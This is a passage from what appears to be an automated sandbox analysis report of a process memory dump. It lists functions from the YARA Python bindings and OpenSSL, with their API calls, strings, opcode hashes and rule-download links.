PyObject_IsTrue.PYTHON27(?), ref: 02D42132
PyObject_IsTrue.PYTHON27(?), ref: 02D42163
PyCallable_Check.PYTHON27(?), ref: 02D42185
PyErr_Format.PYTHON27(?,'include_callback' must be callable,?), ref: 02D421BB

Strings

compile() takes 1 argument, xrefs: 02D42598
'sources' must be a dictionary, xrefs: 02D423E1
keys and values of the filepaths dictionary must be of string type, xrefs: 02D4255D
'externals' must be a dictionary, xrefs: 02D42250
'includes' param must be of boolean type, xrefs: 02D421D4
keys and values of the 'sources' dictionary must be of string type, xrefs: 02D423D0
'include_callback' must be callable, xrefs: 02D4219C
'error_on_warning' param must be of boolean type, xrefs: 02D421AD
filepaths must be a dictionary, xrefs: 02D42571
'file' is not a file object, xrefs: 02D4232B
|ssOOOOOOO, xrefs: 02D420A1

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Object_True$Arg_Callable_CheckErr_FormatKeywords_ParseSizeTuple
String ID: 'error_on_warning' param must be of boolean type$'externals' must be a dictionary$'file' is not a file object$'include_callback' must be callable$'includes' param must be of boolean type$'sources' must be a dictionary$compile() takes 1 argument$filepaths must be a dictionary$keys and values of the 'sources' dictionary must be of string type$keys and values of the filepaths dictionary must be of string type$|ssOOOOOOO
API String ID: 4212806499-3333253616
Opcode ID: ba389c6949fb1f772208d969ab3351441dc828462b96ce5ab0f3da433e346f10
Instruction ID: cf1f8630656584d1a5d07200997af5d978fe4f99b8a84e358173622b9222c5de
Opcode Fuzzy Hash: ba389c6949fb1f772208d969ab3351441dc828462b96ce5ab0f3da433e346f10
Instruction Fuzzy Hash: D1F191B1954340ABC610DF64E888C6B77A9FB88704F944D1DFD8A83304EB35ED95CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D431D0, Relevance: 40.6, APIs: 15, Strings: 8, Instructions: 326COMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27 ref: 02D4325C
PyErr_Format.PYTHON27(?,'externals' must be a dictionary,?,?,?,?,?,?,?,?,?,?,?), ref: 02D4328D
PyCallable_Check.PYTHON27(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D432AD
PyErr_Format.PYTHON27(20000000,'modules_data' must be a dictionary,?,?,?,?,?,?,?,?,?,?,?), ref: 02D432C3
PyCallable_Check.PYTHON27(?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D432DD
PyErr_Format.PYTHON27(00000000,'modules_callback' must be callable), ref: 02D432F4

Strings

|sis#OOOiOOi, xrefs: 02D4321D
'modules_data' must be a dictionary, xrefs: 02D4331A
'callback' must be callable, xrefs: 02D432B6
'modules_callback' must be callable, xrefs: 02D432EE
match() takes at least one argument, xrefs: 02D4327F
'externals' must be a dictionary, xrefs: 02D43368
<data>, xrefs: 02D434F3
<proc>, xrefs: 02D43511

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format$Callable_Check$Arg_Keywords_ParseSizeTuple
String ID: 'callback' must be callable$'externals' must be a dictionary$'modules_callback' must be callable$'modules_data' must be a dictionary$<data>$<proc>$match() takes at least one argument$|sis#OOOiOOi
API String ID: 1778487156-647612975
Opcode ID: ef394df1891e06d182060c20aea3b58f80262dd75eb1dd16b1cf98b24df9845a
Instruction ID: a4377c227b7e6c014053a5188a59ffa1d751e5f8b8a3be556cfc6aaea6dc33be
Opcode Fuzzy Hash: ef394df1891e06d182060c20aea3b58f80262dd75eb1dd16b1cf98b24df9845a
Instruction Fuzzy Hash: 31A1C376A543449FD310DF69E88485BB7E8FB84604FA4896EF849C3300DB35ED95CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02D42610, Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 217threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27(?,?,|sO,02E55CDC,?,?), ref: 02D42642
PyObject_Malloc.PYTHON27(00000014,02E55450), ref: 02D4266C
PyObject_Init.PYTHON27(00000000), ref: 02D42676
PyEval_SaveThread.PYTHON27 ref: 02D4268B
PyEval_RestoreThread.PYTHON27(?,?,0000000C), ref: 02D426AC

Strings

<file-like-object>, xrefs: 02D4276F
load() expects either a file path or a file-like object, xrefs: 02D4285C
read, xrefs: 02D42700
|sO, xrefs: 02D42631

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Eval_Object_Thread$Arg_InitKeywords_MallocParseRestoreSaveSizeTuple
String ID: <file-like-object>$load() expects either a file path or a file-like object$read$|sO
API String ID: 2305183799-969849776
Opcode ID: ed0dac99142cf8b9d7ed78e252f7fb837022c494e595a0e12f5687dba0086c7f
Instruction ID: 69ce501d5b94cc71211fed63c10ad84d077cb9d87d4ef4771204c3d7ee82a54d
Opcode Fuzzy Hash: ed0dac99142cf8b9d7ed78e252f7fb837022c494e595a0e12f5687dba0086c7f
Instruction Fuzzy Hash: CF61E576A403019BC310DF69ECC886AB7A8FF88714B544A59FD4983300DB35ECA5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D43C90, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 152COMMON

Download Yara Rule

APIs

printf.MSVCR90 ref: 02D43CAB
printf.MSVCR90 ref: 02D43CDA
printf.MSVCR90 ref: 02D43CF5
printf.MSVCR90 ref: 02D43D0A
printf.MSVCR90 ref: 02D43D25
printf.MSVCR90 ref: 02D43D38
printf.MSVCR90 ref: 02D43D61
printf.MSVCR90 ref: 02D43D7C
printf.MSVCR90 ref: 02D43DA4
printf.MSVCR90 ref: 02D43DB8
printf.MSVCR90 ref: 02D43DE1
printf.MSVCR90 ref: 02D43DEE
printf.MSVCR90 ref: 02D43E03

Strings

%02x , xrefs: 02D43D5C
%p childs:%d depth:%d failure:%p, xrefs: 02D43CD5
%s = , xrefs: 02D43D20

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: printf
String ID: %02x $%p childs:%d depth:%d failure:%p$%s =
API String ID: 3524737521-1131531689
Opcode ID: fd58cecf12104c131a4fc8fee7c30b5d2240a2feaaf2d2c03ce6c251983d6947
Instruction ID: 890c928e366497d1f2bc9adf0fd63b3ea5240ecc9a1aa9854a63b9531765a614
Opcode Fuzzy Hash: fd58cecf12104c131a4fc8fee7c30b5d2240a2feaaf2d2c03ce6c251983d6947
Instruction Fuzzy Hash: A64108706802245BFB648B5DDC91A7E375AEF81108F2590A6FC8B4B301EF61ED51CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 02D41250, Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 70COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON27(02A9A790,could not open file "%s",?), ref: 02D4129C
PyErr_Format.PYTHON27(02A9A790,could not map file "%s" into memory,?), ref: 02D412B7
PyErr_Format.PYTHON27(02A9A790,invalid rules file "%s",?), ref: 02D412D2
PyErr_Format.PYTHON27(02A9A790,corrupt rules file "%s",?), ref: 02D412EC
PyErr_Format.PYTHON27(02A9A790,external variable "%s" was already defined with a different type,?), ref: 02D4131E
PyErr_Format.PYTHON27(02A9A790,rules file "%s" is incompatible with this version of YARA,?), ref: 02D41339
PyErr_Format.PYTHON27(02A9A790,internal error: %d), ref: 02D4134F

Strings

rules file "%s" is incompatible with this version of YARA, xrefs: 02D41333
scanning timed out, xrefs: 02D412F6, 02D41317
corrupt rules file "%s", xrefs: 02D412E6
internal error: %d, xrefs: 02D41349
access denied, xrefs: 02D4126E, 02D41295
invalid rules file "%s", xrefs: 02D412CC
could not open file "%s", xrefs: 02D41296
external variable "%s" was already defined with a different type, xrefs: 02D41318
could not map file "%s" into memory, xrefs: 02D412B1

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_Format
String ID: access denied$corrupt rules file "%s"$could not map file "%s" into memory$could not open file "%s"$external variable "%s" was already defined with a different type$internal error: %d$invalid rules file "%s"$rules file "%s" is incompatible with this version of YARA$scanning timed out
API String ID: 376477240-1552458549
Opcode ID: 3292fdb8e88293f92c987b78bbf4deef881417a10c88fc040653b17473d1ff00
Instruction ID: 67eb6a2486d5f5e5726bd4af62b477d4b4819bc4fd318d2d19b14c5405e89911
Opcode Fuzzy Hash: 3292fdb8e88293f92c987b78bbf4deef881417a10c88fc040653b17473d1ff00
Instruction Fuzzy Hash: 242181B49E4201EFD714CB62E889C2B37B5BB88A45FD49A8CF88943304C275D9E5CF05

Uniqueness

Uniqueness Score: -1.00%

Function 02D41A10, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

PyErr_SetNone.PYTHON27(?), ref: 02D41A34
PyObject_Malloc.PYTHON27(00000014,02E55310), ref: 02D41A53
PyObject_Init.PYTHON27(00000000), ref: 02D41A5D
PyList_New.PYTHON27(00000000), ref: 02D41A6B
PyDict_New.PYTHON27 ref: 02D41A7A
PyString_FromString.PYTHON27(?), ref: 02D41AB7
PyList_Append.PYTHON27(00000000,00000000), ref: 02D41AC1
_Py_BuildValue_SizeT.PYTHON27(02E55778,?,?), ref: 02D41B2C
PyDict_SetItemString.PYTHON27(?,?,00000000), ref: 02D41B5D

Strings

Out of memory, xrefs: 02D41BE8

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_List_Object_String$AppendBuildErr_FromInitItemMallocNoneSizeString_Value_
String ID: Out of memory
API String ID: 1441624211-696950042
Opcode ID: 7356c287b08ec8846c0b05d8ca9826066f6c0b8fa1bb5385414247957a4da728
Instruction ID: dcd3e86040de10bbd01985f97ef6ffa835f863595a115162836008bea4a1d403
Opcode Fuzzy Hash: 7356c287b08ec8846c0b05d8ca9826066f6c0b8fa1bb5385414247957a4da728
Instruction Fuzzy Hash: 9051E471A803008FC714CF28E884A6673A4FF89324F644B59EC5D87345EB39ED96CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02D89770, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 157registryfilewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4), ref: 02D8978C
GetFileType.KERNEL32(00000000), ref: 02D89799
_vsnprintf.MSVCR90 ref: 02D897B7
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02D897DA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?), ref: 02D8981C
_vsnwprintf.MSVCR90 ref: 02D898B0
GetVersion.KERNEL32 ref: 02D898BE
RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 02D898DB
ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02D89909
DeregisterEventSource.ADVAPI32(00000000), ref: 02D89910
MessageBoxW.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 02D89928

Strings

no stack?, xrefs: 02D8980A
OpenSSL, xrefs: 02D898D4
OpenSSL: FATAL, xrefs: 02D8991A

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMessageMultiRegisterReportTypeVersionWideWrite_vsnprintf_vsnwprintf
String ID: OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 3866500927-278800372
Opcode ID: bc66591ee93ca3f047d1f429ddc269cf008298bac8ec7d1cc555733e7384a958
Instruction ID: 20ae9a272c6e3f2bbaab3be4a68a81ab00f58b08f23905154cafe11e7bac9532
Opcode Fuzzy Hash: bc66591ee93ca3f047d1f429ddc269cf008298bac8ec7d1cc555733e7384a958
Instruction Fuzzy Hash: E3515C71980316ABE720AB60CCA9FFB3779EF44700F109558F9969B384EB719D85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02D41E40, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

PyGILState_Ensure.PYTHON27 ref: 02D41E58
PyString_FromString.PYTHON27(?), ref: 02D41E71
PyString_FromString.PYTHON27(?), ref: 02D41E8C
PyString_FromString.PYTHON27(?), ref: 02D41EA7
PyErr_Fetch.PYTHON27(?,?,?), ref: 02D41EC7
PyObject_CallFunctionObjArgs.PYTHON27(?,6E56FB3D,6E56FB3D,6E56FB3D,00000000), ref: 02D41ED6
PyErr_Restore.PYTHON27(?,?,?), ref: 02D41EED
PyString_AsString.PYTHON27(00000000), ref: 02D41F44
_strdup.MSVCR90(00000000), ref: 02D41F4B
PyErr_Occurred.PYTHON27 ref: 02D41F57
PyErr_Format.PYTHON27(00000000,'include_callback' function must return a yara rules as an ascii or unicode string), ref: 02D41F6F
PyGILState_Release.PYTHON27(?), ref: 02D41F92

Strings

'include_callback' function must return a yara rules as an ascii or unicode string, xrefs: 02D41F69

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Err_StringString_$From$State_$ArgsCallEnsureFetchFormatFunctionObject_OccurredReleaseRestore_strdup
String ID: 'include_callback' function must return a yara rules as an ascii or unicode string
API String ID: 901655891-1855780161
Opcode ID: 159d856af24a0ae5a3faae305996f5ff578bc365f066f3c7c5a4d2fb46bda5df
Instruction ID: ba2f316c9c3a6986a8da2920e56ccc3cae8a03d4c971faaa4065bf8b5a985cdd
Opcode Fuzzy Hash: 159d856af24a0ae5a3faae305996f5ff578bc365f066f3c7c5a4d2fb46bda5df
Instruction Fuzzy Hash: 7741F3B2940301AFC700DF64D8C485B73A8BF88214B540B6DF95A83340DB35ECD6CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E009E0, Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 276stringCOMMON

Download Yara Rule

APIs

strtoul.MSVCR90 ref: 02E00AB3
strtoul.MSVCR90 ref: 02E00B4B

Strings

nomask, xrefs: 02E00C00
mask, xrefs: 02E00B69
min, xrefs: 02E00A73
..\..\openssl-1.1.0e\crypto\asn1\asn_mstbl.c, xrefs: 02E00AD2, 02E00CB1
flags, xrefs: 02E00BC2
name=, xrefs: 02E00CEC
, value=, xrefs: 02E00AFA, 02E00CE6
none, xrefs: 02E00C35
field=, xrefs: 02E00B00
max, xrefs: 02E00B11

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: strtoul
String ID: , value=$..\..\openssl-1.1.0e\crypto\asn1\asn_mstbl.c$field=$flags$mask$max$min$name=$nomask$none
API String ID: 3805803174-245016966
Opcode ID: 59d149a894c3f8638c08f9df1d50ae25812c16bfd45fba3e958281866f5b46cb
Instruction ID: 98fffdfe3e651404b7cacea64e6f59cd20736d75ce52018aa26aab145376d678
Opcode Fuzzy Hash: 59d149a894c3f8638c08f9df1d50ae25812c16bfd45fba3e958281866f5b46cb
Instruction Fuzzy Hash: 53916D716883415ADB109F30CCD1BB73BA69F5121CF48D558E88A9B2C2F722D98FC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02D41C00, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

_PyArg_ParseTupleAndKeywords_SizeT.PYTHON27 ref: 02D41C31
PyEval_SaveThread.PYTHON27(?,?,?,?,?,?,?,?), ref: 02D41C4A
PyEval_RestoreThread.PYTHON27(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02D41C67

Strings

load() expects either a file path or a file-like object, xrefs: 02D41D0A
<file-like-object>, xrefs: 02D41CDD
write, xrefs: 02D41C90
|sO, xrefs: 02D41C1A

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Eval_Thread$Arg_Keywords_ParseRestoreSaveSizeTuple
String ID: <file-like-object>$load() expects either a file path or a file-like object$write$|sO
API String ID: 2135743336-3765213004
Opcode ID: e89df489cb2f8a9336e996811de908718380f3c2fcb498234339fd56aafc4951
Instruction ID: de168d33211b8c976f50709ebc821d9444ad0b5230218df29ef8e7a303bc2675
Opcode Fuzzy Hash: e89df489cb2f8a9336e996811de908718380f3c2fcb498234339fd56aafc4951
Instruction Fuzzy Hash: C63104749902009FC204DB18DC85A5BB3E4FFC4709F844A59FC4983301EB39DA95CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D41520, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON27 ref: 02D41547
PyString_AsString.PYTHON27(?,?), ref: 02D41565
PyObject_IsTrue.PYTHON27(?), ref: 02D41580
PyType_IsSubtype.PYTHON27(?,6E5732A0), ref: 02D415AD
PyString_AsString.PYTHON27(?), ref: 02D415CF
PyDict_Next.PYTHON27(?,?,?,?), ref: 02D41636
PyErr_Format.PYTHON27(?,external values must be of type integer, float, boolean or string), ref: 02D4165E

Strings

external values must be of type integer, float, boolean or string, xrefs: 02D41658

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_NextStringString_$Err_FormatObject_SubtypeTrueType_
String ID: external values must be of type integer, float, boolean or string
API String ID: 3898711963-1563223278
Opcode ID: c465c8a00002d2c45805bd89482473a633d8f9050abf5b67a577126993fdbcbf
Instruction ID: 6f913322456c85cf3c566545f66fe898b65c8ea7a9c1fe88362293da901ed816
Opcode Fuzzy Hash: c465c8a00002d2c45805bd89482473a633d8f9050abf5b67a577126993fdbcbf
Instruction Fuzzy Hash: D54129B19402046BD710EB69EC84E6B77ACEB85614F44595AFC0DC2305EB36DC90CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02D413C0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

PyDict_Next.PYTHON27 ref: 02D413E7
PyString_AsString.PYTHON27(?,?), ref: 02D4140B
PyObject_IsTrue.PYTHON27(?), ref: 02D41422
PyType_IsSubtype.PYTHON27(?,6E5732A0), ref: 02D41450
PyString_AsString.PYTHON27(?), ref: 02D4146E
PyDict_Next.PYTHON27(?,?,?,?), ref: 02D414CC
PyErr_Format.PYTHON27(?,external values must be of type integer, float, boolean or string), ref: 02D414F3

Strings

external values must be of type integer, float, boolean or string, xrefs: 02D414ED

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.531830667.0000000002E0C000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.532570179.0000000002E55000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532682521.0000000002E56000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532725020.0000000002E58000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.532758984.0000000002E59000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.532859527.0000000002E5F000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533010236.0000000002E66000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.533170085.0000000002E67000.00000002.00020000.sdmp Download File

Similarity

API ID: Dict_NextStringString_$Err_FormatObject_SubtypeTrueType_
String ID: external values must be of type integer, float, boolean or string
API String ID: 3898711963-1563223278
Opcode ID: faec3b7a0701d565c8648dbc3cb49e5a4016ac359873676fc830fac68c78f55c
Instruction ID: e0c0e07b91ce85ed4fb3e6888d7ab4c407694464e2981a75308afb05406bdfe1
Opcode Fuzzy Hash: faec3b7a0701d565c8648dbc3cb49e5a4016ac359873676fc830fac68c78f55c
Instruction Fuzzy Hash: 063107B19402046BD310EB69EC84E6B77ACEB85254F849A5AFC4DC3305EA36DD91CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 02DB82D0, Relevance: 16.7, APIs: 11, Instructions: 155fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,00000000,00000001,?,?,02D99F33,?,00000001,00000000,?), ref: 02DB8326
GetLastError.KERNEL32(?,02D99F33,?,00000001,00000000,?,?,?,02DAFC93,?,02E2B7D4,?,02DAFCF2,?,00000002,?), ref: 02DB832E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,02D99F33,?,00000001,00000000,?,?,?,02DAFC93,?), ref: 02DB8352
GetLastError.KERNEL32(?,02D99F33,?,00000001,00000000,?,?,?,02DAFC93,?,02E2B7D4,?,02DAFCF2,?,00000002,?), ref: 02DB835A
fopen.MSVCR90 ref: 02DB8373
MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,02D99F33,?,00000001,00000000,?,?,?,02DAFC93,?), ref: 02DB83AC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000001,00000008,?,00000000,?,02D99F33,?,00000001,00000000,?), ref: 02DB83D9
_wfopen.MSVCR90 ref: 02DB83E7
_errno.MSVCR90 ref: 02DB83F5
_errno.MSVCR90 ref: 02DB83FF
fopen.MSVCR90 ref: 02DB840B

Memory Dump Source

Source File: 00000005.00000002.530871457.0000000002D41000.00000020.00020000.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.530838817.0000000002D40000.00000002.00020000.sdmp Download File
